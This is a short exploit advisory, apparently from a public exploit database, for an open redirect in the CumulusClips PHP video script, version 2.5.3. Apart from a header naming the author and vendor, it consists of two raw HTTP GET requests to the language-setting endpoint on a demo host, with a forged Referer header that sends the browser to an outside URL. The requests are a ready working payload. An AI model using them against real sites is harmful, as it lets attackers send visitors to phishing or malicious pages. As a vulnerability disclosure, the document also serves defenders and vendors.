# Exploit Title: CumulusClips PHP Script HTTP Referer Header Field Open Redirect Vulnerability
# Date: 2017-10-08
# Exploit Author: Esecurity.ir
# Exploit Author Web Site: http://esecurity.ir
# Vendor Homepage: http://cumulusclips.org
# Version: 2.5.3
# Special thanks : Meisam Monsef - Email : meisamrce@gmail.com - TelgramID : @meisamrce
Exploit :
GET /language/set/en/?action=set
Host: demo.cumulusclips.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Referer: http://www.your-url.com/
Demo :
GET /language/set/en/?action=set
Host: demo.cumulusclips.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Referer: https://google.com/